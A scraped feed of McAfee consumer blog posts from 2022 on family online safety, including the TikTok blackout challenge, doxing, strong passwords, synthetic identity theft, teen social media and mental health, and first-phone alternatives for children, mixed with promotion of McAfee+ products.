It’s easy to look at a challenge like this and dismiss it thinking your child would never be involved in such a dangerous game. However, in a recent post from HealthyChildren.org on why kids participate in online dares, pediatricians point to the reality that the teen brain is still developing. The part of the brain that processes rational thought, the prefrontal cortex, is not fully developed until a person’s mid-20s. This physiological reality means teens are naturally impulsive and can do things without stopping to consider the consequences.  

Another lure that entices teens is that social media’s fast-moving, impulsive environment rewards outrageous behavior—the more outrageous the content, the bigger the bragging rights. The fear of losing out (FOMO is natural for teens. 

Signs to look for 

According to the CDC, signs that a child may be engaging in the blackout challenge include: 

  • They may talk about the game or use alternate terms such as “pass–out
    game” “choking game,” or “space monkey.” 
  • They may have bloodshot eyes 
  • You may see marks on their neck 
  • They might have severe headaches 
  • They could show signs of disorientation after spending time alone 
  • You might notice the presence of ropes, scarves, or belts tied to furniture or doorknobs 
  • They may have unexplained items like dog leashes, choke collars, or bungee cords in their room. 

5 talking points for families

  1. Dig in and discuss hard stuff. Set time aside to talk about the viral challenges your child may or may not notice online. Discuss the dangers, the physiology of being impulsive, and how social network communities inherently reward reckless behavior with likes and shares.  
  2. Make the consequences personal. Do your homework. Pull up the relevant headlines and discuss the implications of the blackout challenge (and others), such as lack of oxygen to the brain, seizures, long-term complications, and death.  
  3. Talk about digital peer pressure. Coach your kids through the dangers they encounter online they may take for granted. Ask them how they feel when they see someone doing dangerous things online and ways to avoid or discourage it. Are your kids rallying around the challenges or sharing the content? Do they try to be funny to get attention online?  
  4. Establish ground rules. As tragic as these challenges are, they allow parents to pause and refresh family ground rules for online behavior and media use. Your kids have changed over time, as have their online communities, and interests. Design ground rules and media use expectations to help shape a safe, balanced digital life that reflects their current online activity. 
  5. Add extra protection. We add security systems to our homes for additional protection from outside threats, so too, it’s wise to add security to our family devices to encourage content filtering, monitoring, and time limits.  

Viral challenges will continue to emerge and shock us. There’s no way to anticipate them or control them. However, staying informed about dangerous online trends and keeping the lines of communication with your child open and honest is a big step toward equipping them to live a safe, balanced digital life.  

The post Deadly Digital Dares: The Blackout Challenge on TikTok appeared first on McAfee Blog.

]]>
The Feeling of Safety with McAfee+ https://www.mcafee.com/blogs/internet-security/the-feeling-of-safety-with-mcafee/ Tue, 13 Sep 2022 12:15:32 +0000 https://www.mcafee.com/blogs/?p=158820

Safety has a feeling all its own, and that’s what’s at the heart of McAfee+.  We created McAfee+ so people...

The post The Feeling of Safety with McAfee+ appeared first on McAfee Blog.

]]>

Safety has a feeling all its own, and that’s what’s at the heart of McAfee+. 

We created McAfee+ so people can not only be safe but feel safe online, particularly in a time when there’s so much concern about identity theft and invasion of our online privacy.   

And those concerns have merit. Last year, reported cases of identity theft and fraud in the U.S. shot up to 5.7 million, to the tune of $5.8 billion in losses, a 70% increase over the year prior. Meanwhile, online data brokers continue to buy and sell highly detailed personal profiles with the data cobbled together from websites, apps, smartphones, connected appliances, and more, all as part of a global data-gathering economy estimated at well over $200 billion a year. 

Yet despite growing awareness of the ways personal information is collected, bought, sold, and even stolen, it remains a somewhat invisible problem. You simply don’t see it as it happens, let alone know who’s collecting what information about you and toward what ends—whether legal, illegal, or somewhere in between. A recent study we conducted showed that 74% of consumers are concerned about keeping their personal information private online. Yet, most of us have found out the hard way (when we search for our name on the internet) that there is a lot of information about us that has been made public. It is our belief that every individual should have the right to be private, yet we know too many individuals don’t know where to begin. It is this very worry that made us focus our new product line on empowering our users to take charge of their privacy and identity online. 

McAfee+ gives you that control. 

Now available in the U.S., McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance and support to take the steps to be safer online. Here’s how: 

  • You’ll see where your personal information appears in risky locations online, such as people search and data broker sites that sell this information to advertisers, in addition to hackers, spammers, and thieves. Then McAfee+ helps you remove it (or depending on the plan we do it for you). We call this Personal Data Cleanup. 

  • It protects you by scanning the dark web for places where your personal information may appear. This way you can keep an eye on your email addresses, social security number, credit card numbers, and more on the dark web—and receive notifications an average of 10 months sooner than similar services if your info is found in a data breach. This gives you ample time to change your passwords before hackers try to access your account. Depending on your plan, McAfee+ offers you $1M identity theft coverage and credit monitoring services as well for additional peace of mind. 
  • You’ll also see how safe you are with our industry-first Protection Score. It checks the health of your online protection and shows you ways you can improve your score so you’re safer still. 

  • And as always, it all includes McAfee’s award-winning antivirus and device security solution.  

You can see the entire range of features that cover your identity, privacy, and security with a visit to our McAfee+ page 

McAfee+ Ultimate offers our most thorough protection, with which you can lock your credit with a click or put a comprehensive security freeze in place, both to thwart potential identity theft. You can keep tabs on your credit with daily credit monitoring and get an alert when there’s credit activity to spot any irregularities quickly.  

You’ll also feel like someone has your back. Even with the most thorough measures in place, identity theft and ransomware attacks can still strike, which can throw your personal and financial life into a tailspin. What do you do? Where do you start? Here, we have you covered. We offer two kinds of coverage that can help you recover your time, money, and good name:  

  • $1 million in identity theft coverage and with the assistance of professional identity restoration specialists who can take steps to repair your identity and credit. 
  • $25,000 in ransomware coverage, which likewise comes with expert support that can help you determine the severity of a ransomware attack, learn what immediate steps you can take, and determine if a ransom should be paid or if alternative options exist. 

Starting today, customers in the U.S. can purchase McAfee+ online at McAfee.com in Premium, Advanced, and Ultimate plans, in addition to individual and family subscriptions. McAfee+ will also be available online in the U.K., Canada, and Australia in the coming weeks with additional regions coming in the months ahead (features may vary by region). 

We are very excited about bringing these new protections to you and we hope you will be too.  

The post The Feeling of Safety with McAfee+ appeared first on McAfee Blog.

]]>
5 Things About Doxing You Should Know https://www.mcafee.com/blogs/internet-security/5-things-about-doxing-you-should-know/ Thu, 08 Sep 2022 12:40:14 +0000 https://www.mcafee.com/blogs/?p=158725

Have you ever said something you wish you could take back? Maybe it was a comment muttered in the heat...

The post 5 Things About Doxing You Should Know appeared first on McAfee Blog.

]]>

Have you ever said something you wish you could take back? Maybe it was a comment muttered in the heat of the moment that hurt someone’s feelings. Or maybe you just had a night out full of silly antics that you wouldn’t want your boss or grandma to see.  

These are completely normal occurrences that happen all the time. We’re human! We make mistakes and letting loose every now and again is good for us. When these scenarios happen in person, we’re able to apologize or explain ourselves; however, the social media age complicates things. High-def cameras and video recorders are in everyone’s pocket, meaning that in-person slip-ups or lapses in judgement can come back to haunt you in a cyberscheme known as doxing. 

Doxing can be harmful to one’s reputation and can cost someone their job, their friends, or their privacy. Here are five things you should know about doxing, plus some tips on how to prevent it from happening to you. 

1. Doxing Defined

The term doxing originated from the phrase “dropping documents/docs.” It refers to a situation where an enemy or a rival seeks to tarnish the reputation of someone else by releasing documents (aka dropping docs) about them. These documents often contain personally identifiable information (PII) –  like full names, birthdates, addresses, employment details, financial information, phone numbers, email addresses – and private correspondences or embarrassing videos or photos. The doxer – or the person dropping the documents – will publish these private details online, whether that’s on a forum, on social media, or a blog. 

Doxing is considered cyberbullying because it is a form of online harassment. The doxer often does so with the intent of drumming up widespread hate about the victim and having the release of these private details negatively affect the victim’s life, such as getting them fired from their job or breaking up a relationship. 

2. Doxing Can Happen to Anyone

Doxing happens most frequently to public figures, such as celebrities, politicians, streamers, and journalists. It is also a prevalent practice in the hacking community, where hackers reveal the identities of the real people behind forum usernames. However, anyone is susceptible to having their PII or sensitive photos or videos widely released on the internet for the sake of reputation sabotage. All it takes is for one scorned partner, a disgruntled coworker, or a disagreement to set a doxer on a warpath.  

3. Doxing Isn’t Always Illegal

When the saboteur doesn’t have to dig into your past via the dark web or through hacking a personal device, doxing isn’t illegal. It’s malicious and can be emotionally damaging, but there is no law stopping a doxer from publishing the private details of someone else. Doxing crosses the line into a crime when it is accompanied by threats.  

So, if a doxer didn’t hack a personal device or buy the PII off the dark web, where did they find these details? Oftentimes, people incriminate themselves with their social media footprint. What seems like ancient history in your social media timeline is again front and center after just a few minutes of scrolling. 

4. Ways to Prevent Doxing From Happening to You

Check out these tips that can lessen the chances of doxing happening to you: 

  • Don’t goad people online. Doxing can happen to anyone. Sometimes the doxer is someone you know in real life, but other times it’s a stranger with whom you may or may not have crossed paths with online. One great rule of thumb is to not make enemies online. For example, if you disagree with someone online, be as respectful and polite to them as you would be if you were talking face to face. 
  • Don’t overshare. Remember, you can’t take back what you post online! Think long and hard before you hit publish on any social media post or comment. Never post online when you’re angry. You’ll likely say something that you’ll regret later.  
  • Delete old accounts. Periodically taking stock of all your online accounts and deactivating the ones you no longer use limits the number of opportunities a doxer has to lift your PII, such as your address, banking details, or contact information. Not every site prioritizes security as much as we’d all hope, so it’s best to create online accounts with trustworthy organizations. To track down all your accounts, especially the ones you haven’t used in a while, one technique is to go through your email and make note of all the sites from which you receive notifications. This will provide you with a robust list of companies that have your information. This might be tedious, so don’t be hard on yourself if you don’t find them all. Consider splitting up the work over a few weeks to make it less of a chore. 
  • Use one-time credit cards. One pro tip that may help you protect your information online is to use safe cards, or one-time credit cards. When you use a safe card, you don’t have to provide any identifying information when you make a purchase. Again, the aim here is to limit how many sites have access to your PII. 

5. Services That Can Give You Peace of Mind

In addition to the above tips, McAfee can help you fill in the gaps in your defense. McAfee Total Protection is an all-in-one privacy and identity protection service that includes all the tools you need to secure your PII and help you recover if identity theft occurs after a doxing incident. Personal Data Cleanup scans 40 risky data broker sites for your information. If you appear on any of those sites, McAfee will help you remove it to keep your PII out of a doxer’s hands. 

The post 5 Things About Doxing You Should Know appeared first on McAfee Blog.

]]>
Strong Password Ideas to Keep Your Information Safe https://www.mcafee.com/blogs/privacy-identity-protection/strong-password-ideas-to-keep-your-information-safe/ Wed, 07 Sep 2022 13:31:27 +0000 /blogs/?p=102825

Password protection is one of the most common security protocols available. By creating a unique password, you are both proving...

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blog.

]]>

Password protection is one of the most common security protocols available. By creating a unique password, you are both proving your identity and keeping your personal information safer. However, when every account you have requires a separate password, it can be an overwhelming task. While you should be concerned about the safety of your data, you also want to avoid the frustration of forgetting your password and being blocked from the information you need. However, the benefits of using strong, unique passwords outweigh the occasional inconvenience.

Benefits of Strong Passwords

The main benefit of a strong password is security. Hackers work quickly when they are trying to access accounts. They want to steal as much information as they can in as short a time as possible. This makes an account with a strong password less inviting because cracking the code is much more involved.

A strong password also limits the damage that hackers can do to your personal accounts. A common strategy involves cracking the passwords of less secure sites with limited personal information. The hackers hope that they can use the password from your gym membership app to access information in your online banking account. Strong password protection prevents this situation.

Common Poor Password Practices

When someone is registering an online account, it can be tempting to blaze through the password process. In order to move quickly, there are several poor password practices that people employ.

  • Simple passwords: Password-cracking programs start by entering obvious combinations. These are passwords where the user puts no thought into the code such as “password” or “1234567”.
  • Repeated passwords: You may think you have such an unbreakable password that you want to use it for all of your accounts. However, this means that if hackers compromise one of your accounts, all of your other accounts are vulnerable.
  • Personal information: The number combinations that you are apt to remember easily are the ones that hackers can find. You may have put your birthday or graduation year on public display in a social media account. Your dog’s name may be unusual, but if you share information about your canine friend with the world, its name is a weak password.

The Meaning of a Strong Password

A password is considered strong when it is difficult for a hacker to crack it quickly. Sophisticated algorithms can run through many password combinations in a short time. A password that is long, complex and unique will discourage attempts to break into your accounts.

  • Long: The combinations that protect your accounts should be long enough that it would be difficult for a computer program to run through all the possible configurations. The four-digit pin on a bank card has 10,000 possible combinations. This might take some time for a human being to crack, but a computer program with unlimited tries could break it in a few seconds. If you were only using numbers, every character in your password would raise the possible combinations by a power of 10. To stump the algorithms, you want a password that is a minimum of 12 characters long.
  • Complex: To increase the challenge of your password, it should have a combination of uppercase letters, lowercase letters, symbols and numbers. Hacking algorithms look for word and number patterns. By mixing the types of characters, you will break the pattern and keep your information safe.
  • Unique: If you have been reusing your passwords, it is time for you to start the work of changing them. Every one of your accounts should have its own password. At the very least, make certain that you have not reused passwords for your financial institutions, social media accounts and any work-related accounts.

Creating a Layered Password

If you want a password that is memorable but strong, you can easily turn a phrase into a layered, complex password. In this process, it is important to note that you should not use personal information that is available online as part of your phrase.

  • Pick a phrase that is memorable for you: It should not be a phrase you commonly use on social media accounts. If you are an avid runner you might choose a phrase like, “Running 26.2 Rocks!”
  • Replace letters with numbers and symbols: Remove the spaces. Then, you can put symbols and numbers in the place of some of the letters. Runn1ng26.2R0ck$!
  • Include a mix of letter cases: Finally, you want both lower and uppercase letters that are not in a clear pattern. Algorithms know how to look for common patterns like camelCase or PascalCase. Runn1NG26.2R0cK$!

Now, you have a password that you can remember while challenging the algorithms hackers use.

Employing a Password Manager

When you consider the number of accounts you need to protect, coming up with a properly layered password is a time-consuming task. Even if you are able to decide on a memorable phrase, there are just too many accounts that need passwords. A password manager is a helpful tool to keep you safe while you are online. It acts as a database for all of your passwords. Each time you create a new code, it stores it so that you can automatically enter it later. You only need to remember a single password to access the tools of your manager.

Most managers can also do the work of creating complex, layered passwords for your accounts. These will be a string of random numbers, letters and characters. They will not be memorable, but you are relying on the manager to do the memorizing. These machine-generated passwords are especially helpful for accounts you rarely access or that do not hold significant information.

Maintaining an Offline Password List

For critical accounts like your bank account or a work-related account, it can be helpful to keep an offline list of your passwords. Complex passwords are meant to be difficult to remember. You may recall the phrase but not all the detailed changes that make it layered. Keeping a document on a zip drive or even in a physical paper file or journal will allow you to access your information if your hardware fails or you are switching to a new system.

Keeping the Whole System Safe

Cracking passwords is just one of the strategies hackers use to steal information. In addition to using strong passwords, it is important to employ comprehensive security software. Strong passwords will help protect your online accounts. Strong overall security will keep your hardware and network safe from danger.

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blog.

]]>
Kicking Off a New School Year with New Online Habits https://www.mcafee.com/blogs/family-safety/kicking-off-a-new-school-year-with-new-online-habits/ Tue, 06 Sep 2022 13:20:31 +0000 https://www.mcafee.com/blogs/?p=158579

Most every parent loves a new school year. Most likely because the beloved milestone offers us a clean slate and...

The post Kicking Off a New School Year with New Online Habits appeared first on McAfee Blog.

]]>

Most every parent loves a new school year. Most likely because the beloved milestone offers us a clean slate and a chance to do things better, shape new habits, and close those digital safety gaps.

The hope that fuels change is a powerful thing. However, if you want to ensure your new habits stick, there’s some science you might consider. Psychologists suggest that to make a new change permanent, you should start with smaller, micro-size choices that will lead to sustainable patterns and habits. Micro habits allow you to take safe steps that are too small to fail but effective enough to generate long-term change. 

Committing to Micro-Habits 

Breaking down the task online safety into bite-sized pieces is a great approach for parents eager to put better habits into play this year. Establishing new ground rules doesn’t have to include restrictions, tantrums, or tears. You can start small, commit to work together, and build your new habits over time. 

So often in this blog we offer a combination of practical digital tips proven to work such as robust password protocols, privacy settings, parental controls, smart phone protection, and social network/app safety.  

Today, however, we will flip that approach and give you some foundations that will no doubt support and amplify your family’s daily online safety efforts. Ready? Here we go! 

5 Foundations of Healthy Family Tech Habits 

1. Put connection first.

We’re all connected 24/7 but to what? Equipping kids to make wise decisions online begins with intentional, face-to-face connection at home with a parent or caregiver. When the parent-child relationship is strong, trust grows, and conversation flows. If and when a challenge arises, your child is more likely to turn to you.  

Micro-habit: If your family doesn’t eat dinner together, start with one night a week (stay consistent with the day). Make the dinner table a no-phone zone and spend that time together listening and connecting. Build from there.  

 

2. Step into their world. 

The new school year is a chance to get more involved with your child’s day-to-day communities (on and offline), including their teachers, friend groups, or hobbies. If you’ve been on the sidelines in the past, taking a few steps into their world can give you an exceptional understanding of their online life. Knowing where they go and who they know online has never been more critical, as outlined in our recent Connected Family Report. 

Micro-habit: Does your child have a favorite app? Download it, look around, and understand the culture.  

3. Prioritize sleep. 

Summer—coupled with extra time online (often unmonitored)—can wreak havoc on a child’s sleep patterns, which, in turn, wreaks havoc on a family. If you have a tween or teen, ensuring they get the required hours of sleep is a significant way to keep them safe online. Think about it. Fatigue can impair judgment, increase anxiety, impact grades, and magnify moodiness, putting a child’s physical and emotional wellbeing at risk online and off.  

Micro-habit: Think about setting a phone curfew that everyone agrees on. Giving your child input into the curfew makes it less of a restriction and more of a health or lifestyle shift. Remember, your child’s device is their lifeline to their peers so cutting them off isn’t a long-term solution.  

4. Monitor mental health. 

With kids spending so much time on apps like TikTok, Instagram, Snapchat, and YouTube, those platforms inevitably influence your child more than just about anyone. Be on the lookout for behavior changes in your child that may be connected to digital risks such as cyberbullying, sextortion, gaming addiction, inappropriate content, or connecting with strangers.

Micro-habit: Consider setting time limits that allow your child to enjoy their online hangouts without being consumed or overly influenced by the wrong voices. Apply limits in small blocks at first and grow from there.  

5. Aim for balance. 

Balancing your online life with face-to-face activities and relationships is a must for your child’s physical and emotional wellbeing. But sometimes, striving for that balance can feel overwhelming. Being too stringent can cause big plans to collapse, sending our behaviors in the opposite direction. Balance requires constant re-calibration and pausing to take those small bites. 

Micro-habit: Commit to one family outdoor activity together a month. Take a hike, learn to fish, take up tennis. Make the outings phone-free zones. Be consistent with your monthly micro-habit and build from there.  

It’s been proven that any change you attempt to make ignites a degree of friction. And prolonged friction can discourage your efforts to stick to new habits. Ignore that noise and keep moving forward. Stay the course parents because this is the year your best intentions take shape.   

The post Kicking Off a New School Year with New Online Habits appeared first on McAfee Blog.

]]>
What Is Synthetic Identity Theft? https://www.mcafee.com/blogs/internet-security/what-is-synthetic-identity-theft/ Mon, 05 Sep 2022 12:22:47 +0000 https://www.mcafee.com/blogs/?p=158674

It’s too bad cybercriminals don’t funnel their creativity into productive pursuits because they’re constantly coming up with nefarious new ways...

The post What Is Synthetic Identity Theft? appeared first on McAfee Blog.

]]>

It’s too bad cybercriminals don’t funnel their creativity into productive pursuits because they’re constantly coming up with nefarious new ways to eke out money and information from unsuspecting people. One of their newest schemes is called synthetic identity theft, a type of identity theft that can happen to anyone. Luckily, there are ways to lower the chance of it happening to you. And if it does happen to you, there are a few preventive measures you can take. Plus when you’re able to identify the early signs, you can minimize its damage to your finances and your credit. 

Here’s everything you need to know about synthetic identity theft in order to keep your and your family’s information safe. 

What Is Synthetic Identity Theft? 

Synthetic identity theft occurs when a cybercriminal steals a real Social Security Number (SSN) but fabricates the rest of the details that are associated with that SSN, such as the full name and birthdate. With this valid SSN, they’re able to create an entirely new identity and use it to take out loans, apply for credit cards, or even purchase a house.  

This form of identity theft is more difficult than traditional identity theft to detect. When a criminal steals someone’s entire identity – their name, birthdate, address, and SSN – there are more flags that could raise the alarm that something is amiss. Additionally, in some cases of synthetic identity theft, cybercriminals play the long game, meaning that they build up excellent credit with their new fake identity for months or even years. Then, once they’ve squeezed as much as they can from that great credit, they rack up huge charges against that credit and flee. It is only then when creditors demand payment that the rightful owner of the SSN finds out their identity was compromised.  

Synthetic identity theft can severely damage the credit or finances of the person to whom the SSN truly belongs. It most often occurs to people who don’t closely monitor their credit, such as children, people in jail, or the elderly, but it can happen to anyone. 

Signs Your Identity May Be Stolen 

The signs of synthetic identity theft are a bit different than the signs of regular identity theft. In traditional identity theft, you may receive bills to your address either with someone else’s name on them or for organizations with which you don’t have an account. However, in the case of synthetic identity theft, since the thief makes up an entirely new name and address, you’re unlikely to accidentally get their mail. 

The major red flag is if your credit score is drastically lower (or higher) than you remember it being. Did you know that you can request one free credit report per year from each major credit bureau? Get in the habit of ordering reports regularly to keep tabs on your credit and confirm that there are no new accounts that you didn’t create. 

How to Protect Your Identity 

Check out these tips on how to protect your identity online to hopefully prevent it from ever happening to you: 

  • Never share your SSN. There is a very short list of organizations who require your SSN: the IRS, your bank, the Registry of Motor Vehicles, and your work’s payroll department. If anyone else requests your SSN, it’s not rude to inquire why they need it. In cases where you do have to share your SSN, never do so over electronic correspondences. Either visit the organization in person or call them in a private location that is clear of eavesdroppers. 
  • Set up credit locks. If you aren’t planning to file for a credit card or take out a loan anytime soon, consider locking your credit. This is a process where you reach out to the major credit bureaus and notify them to deny any new claims or requests made against your name or SSN. Locking your credit is a great preventive measure that can guard against many criminal scenarios. 
  • Keep an eye on the news. Cybersecurity breaches of major companies occur with more frequency than we’d all like to see. One way to protect your identity is to watch the headlines to keep tabs on recent breaches. If a company with which you have an account is affected, take action immediately. This includes changing your password to your account and diligently tracking your bank statements for any signs that you may have been affected. 

Identity Protection Provides Security, Peace of Mind 

McAfee Identity Protection is a comprehensive identity monitoring service that protects your identity and privacy from the fastest-growing financial crimes in America. McAfee can scan risky websites to see if your information was leaked in a recent breach. Additionally, with the new security freeze feature, you can deny access to your credit report, which stops fraudsters from opening new credit cards or bank or utility accounts in your name. Finally, if the worst does happen, McAfee Identity Protection offers up to $1 million in identity theft coverage and restoration. 

If you don’t do so already, commit to a routine of monitoring your credit and financial accounts. It only takes a few minutes every month. To fill in the gaps, trust McAfee! 

The post What Is Synthetic Identity Theft? appeared first on McAfee Blog.

]]>
Back-to-School: Balancing Social Media & Mental Health https://www.mcafee.com/blogs/family-safety/back-to-school-balancing-social-media-mental-health/ Fri, 02 Sep 2022 12:31:18 +0000 https://www.mcafee.com/blogs/?p=158723

Wouldn’t it be nice if, along with grades for English, Science, and Algebra this year, our child’s report card included...

The post Back-to-School: Balancing Social Media & Mental Health appeared first on McAfee Blog.

]]>

Wouldn’t it be nice if, along with grades for English, Science, and Algebra this year, our child’s report card included quarterly feedback on their mental health?  

Recently, actor Tom Holland of Spider-Man fame reported on his mental health publicly by deleting several of his social media accounts. The actor stated that his social media accounts had become “detrimental” to his mental state and that he “spirals” when he reads things about himself online. He used words like “overstimulating” and “overwhelming.”  

And parents were likely “overjoyed” giving cyber high fives all around with Holland’s transparency in talking so publicly about social media’s link to mental health. Because if you are a parent you know. 

As we head into a new school year with high hopes in tow, Holland’s decision also challenges us to pay closer attention to how social media could potentially impact our kids’ mental health.   

A few questions for families to consider: 

  • Have we (really) talked about the mental health risks connected to social media (cyberbullying, body image issues, digital drama, tech addiction, fake news, and FOMO)?  
  • What social media safety topics do we need to refresh (based on age)? 
  • Have we put the right digital safeguards in place to minimize mental health risks? 
  • How much time online is appropriate for my child’s age and maturity level? 
  • Are my child’s mood changes age-appropriate, or is it something more? 
  • Has my child’s appearance, attitude, health, or grades changed?  
  • Does my child feel supported and know where to turn for help? (Am I sure of that, or am I making assumptions?) 

Every child’s maturity and cognitive ability to handle online challenges will differ, so a one-size-fits-all digital wellbeing plan isn’t likely to work. Here are a few insights and tips that may be helpful as you shape the method that works for your family.  

Explore healthy social media limits. 

  1. Explore time limits. Research continues to find that reducing social media use directly reduces loneliness, depression, and anxiety. Most every child needs help with balance, especially at the start of a new school year when a new routine is in play. Pay attention to your child’s social media use and consider establishing time limits if needed. Be sure to include your child in the conversation. Ask them to define what a healthy digital balance means to them and how to tie (or untie) behaviors to those goals 
  2. Pay attention to friend groups. As a parent, you’ve got a million things to pay attention to, but few things are more important than the people your child consistently spends time with on and offline. This circle of influence is powerful and can change online constantly. 
  3. Make your parent-child relationship a priority. Not all signs of emotional distress will be visible; some will be subtle or intentionally hidden by your child. That’s why it’s so important to take the time to connect, listen, and truly understand how your child is doing.
  4. Practice digital health. Digital, mental, and physical health are intertwined. Show your child what balanced and healthy digital habits look like. These include online health in conflict management, wise posting and commenting, and time limits. Offline, this includes modeling healthy physical habits such as exercising, meditation, and deep breathing, building healthy face-to-face relationships, and getting enough sleep.
  5. Know the signs. Consider looking more closely into how your child’s online activities might impact them emotionally. Be aware of shifts in behavior, grades, and sleeping patterns. Know the signs that they may be experiencing online bullying.   
  6. Layer Up Your Power. Consider technology your parenting partner to help reduce the mental health risks your child may encounter online. Parental controls on family devices can help you monitor their wellbeing and set time limits.
  7. Proceed with care. If you know your child is having challenges online, it’s important not to overreact and restrict device use altogether. Kids need peer connection, and online is where they tend to connect the most (like it or not, agree or not). Consider ways to help them balance their time online. Discuss the pros and cons of their favorite apps before making drastic changes.   
  8. Ask for help. Talk with your kids daily, and if you believe they need additional help beyond your scope of knowledge, be prepared to find resources to help. If you or a family member is in immediate crisis, visit the emergency room or call National Suicide Prevention Lifeline at (800) 273-8255. 

Any way you slice it, many unknowns come with every new school year, especially if you have tweens or teens. Social media adds a layer of complexity to those unknowns. However, with some forethought and follow-through, you can navigate those risks one day at a time.  

The post Back-to-School: Balancing Social Media & Mental Health appeared first on McAfee Blog.

]]>
Smartphone Alternatives: Ease Your Way into Your Child’s First Phone https://www.mcafee.com/blogs/mobile-security/smartphone-alternatives-ease-your-way-into-your-childs-first-phone/ Thu, 01 Sep 2022 13:21:39 +0000 https://www.mcafee.com/blogs/?p=154531

“But everyone else has one.”  Those are familiar words to a parent, especially if you’re having the first smartphone conversation...

The post Smartphone Alternatives: Ease Your Way into Your Child’s First Phone appeared first on McAfee Blog.

]]>

“But everyone else has one.” 

Those are familiar words to a parent, especially if you’re having the first smartphone conversation with your tween or pre-teen. In their mind, everyone else has a smartphone so they want a one too. But does “everyone” really have one? Well, your child isn’t wrong.  

Our recent global study found that 76% of children aged 10 to 14 reported using a smartphone or mobile device, with Brazil leading the way at 95% and the U.S. trailing the global average at 65%.   

Our figures show that younger children with smartphones and mobile devices make up a decisive majority of younger children overall. 

Of course, just because everyone else has smartphone doesn’t mean that it’s necessarily right for your child and your family. After all, with a smartphone comes access to a wide and practically unfettered world of access to the internet, apps, social media, instant messaging, texting, and gaming, all within nearly constant reach. Put plainly, some tweens and pre-teens simply aren’t ready for that just yet, whether in terms of their maturity, habits, or ability to care for and use a device like that responsibly. 

Yet from a parent’s standpoint, a first smartphone holds some major upsides. One of the top reasons parents give a child a smartphone is “to stay in touch,” and that’s understandable. There’s something reassuring knowing that your child is a call or text away—and that you can keep tabs on their whereabouts with GPS tracking. Likewise, it’s good to know that they can reach you easily too. Arguably, that may be a reason why some parents end up giving their children a smartphone a little sooner than they otherwise would.  

However, you don’t need a smartphone to do to text, track, and talk with your child. You have alternatives. 

Smartphone alternatives 

One way to think about the first smartphone is that it’s something you ease into. In other words, if the internet is a pool, your child should learn to navigate the shallows with some simpler devices before diving into the deep end with a smartphone.  

Introducing technology and internet usage in steps can build familiarity and confidence for them while giving you control. You can oversee their development, while establishing rules and expectations along the way. Then, when the time is right, they can indeed get their first smartphone. 

But how to go about that? 

It seems a lot of parents have had the same idea and device manufacturers have listened. They’ve come up with smartphone alternatives that give kids the chance to wade into the mobile internet, allowing them to get comfortable with device ownership and safety over time without making the direct leap to a fully featured smartphone. Let’s look at some of those options, along with a few other long-standing alternatives. 

GPS trackers for kids 

These small and ruggedly designed devices can clip to a belt loop, backpack, or simply fit in a pocket, giving you the ability to see your child’s location. In all, it’s quite like the “find my” functionality we have on our smartphones. When it comes to GPS trackers for kids, you’ll find a range of options and form factors, along with different features such as an S.O.S. button, “geofencing” that can send you an alert when your child enters or leaves a specific area (like home or school), and how often it sends an updated location (to regulate battery life).  

Whichever GPS tracker you select, make sure it’s designed specifically for children. So-called “smart tags” designed to locate things like missing keys and wallets are just that—trackers designed to locate things, not children. 

Smart watches for kids 

With GPS tracking and many other communication-friendly features for families, smart watches can give parents the reassurance they’re looking for while giving kids a cool piece of tech that they can enjoy. The field of options is wide, to say the least. Smart watches for kids can range anywhere from devices offered by mobile carriers like Verizon, T-Mobile, and Vodaphone to others from Apple, Explora, and Tick Talk. Because of that, you’ll want to do a bit of research to determine the right choice for you and your child.  

Typical features include restricted texting and calling, and you’ll find that some devices are more durable and more water resistant than others, while yet others have cameras and simple games. Along those lines, you can select a smart watch that has a setting for “school time” so that it doesn’t become a distraction in class. Also, you’ll want to look closely at battery life, as some appear to do a better job of holding a charge than others.  

Smartphones for kids 

Another relatively recent entry on the scene are smartphones designed specifically for children, which offer a great step toward full-blown smartphone ownership. These devices look, feel, and act like a smartphone, but without web browsing, app stores, and social media. Again, features will vary, yet there are ways kids can store and play music, stream it via Bluetooth to headphones or a speaker, and install apps that you approve of.  

Some are paired with a parental control app that allows you to introduce more and more features over time as your child as you see fit—and that can screen texts from non-approved contacts before they reach your child. Again, a purchase like this one calls for some research, yet names like Gabb wireless and the Pinwheel phone offer a starting point. 

The flip phone 

The old reliable. Rugged and compact, and typically with a healthy battery life to boot, flip phones do what you need them to—help you and your child keep in touch. They’re still an option, even if your child may balk at the idea of a phone that’s “not as cool as a smartphone.” However, if we’re talking about introducing mobile devices and the mobile internet to our children in steps, the flip phone remains in the mix.  

Some are just phones and nothing else, while other models can offer more functionality like cameras and slide-out keyboards for texting. And in keeping with the theme here, you’ll want to consider your options so you can pick the phone that has the features you want (and don’t want) for your child. 

Ease into that first smartphone 

Despite what your younger tween or pre-teen might think, there’s no rush to get that first smartphone. And you know it too. You have time. Time to take eventual smartphone ownership in steps, with a device that keeps you in touch and that still works great for your child.  

By easing into that first smartphone, you’ll find opportunities where you can monitor and guide their internet usage. You’ll also find plenty of moments to help your child start forming healthy habits around device ownership and care, etiquette, and safety online. In all, this approach can help you build a body of experience that will come in handy when that big day finally comes—first smartphone day. 

The post Smartphone Alternatives: Ease Your Way into Your Child’s First Phone appeared first on McAfee Blog.

]]>
Aussies Fear Snakes, Spiders and Getting Hacked https://www.mcafee.com/blogs/internet-security/aussies-fear-snakes-spiders-and-getting-hacked/ Wed, 31 Aug 2022 15:08:56 +0000 https://securingtomorrow.mcafee.com/?p=96974

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t...

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blog.

]]>

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.

With news of data breaches and hacking crusades filling our news feed on a regular basis, many of us are becoming more aware and concerned about the threats we face in our increasingly digital world. And McAfee’s latest confirms this with hackers making their way into Australia’s Top 10 Fears.

According to research conducted by McAfee, snakes are the top phobia for Aussies followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in in 5th place beating the dentist, bees, ghosts, aeroplane travel and clowns!

Aussie Top 10 Fears and Phobias

  1. Snakes
  2. Spiders
  3. Heights
  4. Sharks
  5. Hackers/Cybercriminals
  6. The dentist
  7. Bees or wasps
  8. Ghosts
  9. Aeroplane travel
  10. Clowns

Why Do We Have Phobias?

